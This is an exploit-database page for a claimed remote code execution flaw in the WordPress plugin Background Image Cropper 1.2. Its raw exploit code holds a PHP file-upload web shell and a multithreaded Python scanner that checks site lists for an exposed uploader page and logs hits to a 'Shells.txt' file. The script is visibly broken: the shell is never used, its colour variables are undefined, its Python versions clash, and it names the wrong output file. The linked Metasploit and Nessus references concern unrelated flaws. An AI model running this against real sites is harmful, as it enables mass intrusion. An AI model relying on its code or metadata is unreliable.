header-logo
Suggest Exploit
vendor:
Wordpress Plugin Background Image Cropper
by:
Milad Karimi (Ex3ptionaL)
6.1
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: Wordpress Plugin Background Image Cropper
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: CVE pending assignment
CPE: a:wordpress:background_image_cropper:1.2
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2022-2602/https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2022-22942/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=93999https://www.infosecmatter.com/nessus-plugin-library/?id=94000https://www.infosecmatter.com/nessus-plugin-library/?id=72553https://www.infosecmatter.com/nessus-plugin-library/?id=149614https://www.infosecmatter.com/nessus-plugin-library/?id=132032https://www.infosecmatter.com/nessus-plugin-library/?id=129806https://www.infosecmatter.com/nessus-plugin-library/?id=129339
Platforms Tested: Windows 10, Firefox
2024

WordPress Plugin Background Image Cropper v1.2 – Remote Code Execution

The vulnerability in Wordpress Plugin Background Image Cropper v1.2 allows remote attackers to execute arbitrary code on the target system. By uploading a malicious PHP file, an attacker can run commands on the server remotely. This vulnerability has a CVE ID pending assignment.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Wordpress Plugin Background Image Cropper to the latest version or remove the plugin if not necessary.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution
# Date: 2024-04-16
# Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/background-image-cropper/
# Version: 1.2
# Category : webapps
# Tested on: windows 10 , firefox

import sys , requests, re
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)
shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo
"<form method='post' enctype='multipart/form-data'> <input type='file'
name='zb'><input type='submit' name='upload' value='upload'></form>";
if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'],
$_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to
Upload."; } } ?>"""
requests.urllib3.disable_warnings()
headers = {'Connection': 'keep-alive',
            'Cache-Control': 'max-age=0',
            'Upgrade-Insecure-Requests': '1',
            'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A
Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0
Chrome/60.0.3112.107 Moblie Safari/537.36',
            'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
            'referer': 'www.google.com'}
try:
    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
    path = str(sys.argv[0]).split('\\')
    exit('\n  [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')

def URLdomain(site):
    if site.startswith("http://") :
        site = site.replace("http://","")
    elif site.startswith("https://") :
        site = site.replace("https://","")
    else :
        pass
    pattern = re.compile('(.*)/')
    while re.findall(pattern,site):
        sitez = re.findall(pattern,site)
        site = sitez[0]
    return site


def FourHundredThree(url):
    try:
        url = 'http://' + URLdomain(url)
        check =
requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
allow_redirects=True,timeout=15)
        if 'enctype="multipart/form-data" name="uploader"
id="uploader"><input type="file" name="file" size="50"><input name="_upl"
type="submit" id="_upl" value="Upload' in check.content:
                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                open('Shells.txt', 'a').write(url +
'/wp-content/plugins/background-image-cropper/ups.php\n')
        else:
            url = 'https://' + URLdomain(url)
            check =
requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers,
allow_redirects=True,verify=False ,timeout=15)
            if 'enctype="multipart/form-data" name="uploader"
id="uploader"><input type="file" name="file" size="50"><input name="_upl"
type="submit" id="_upl" value="Upload' in check.content:
                    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
                    open('Shells.txt', 'a').write(url +
'/wp-content/plugins/background-image-cropper/ups.php\n')
            else:
                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
    except :
        print ' -| ' + url + ' --> {}[Failed]'.format(fr)

mp = Pool(150)
mp.map(FourHundredThree, target)
mp.close()
mp.join()

print '\n [!] {}Saved in LOL.txt'.format(fc)

Navigation

Suggest Exploit

Services By CQR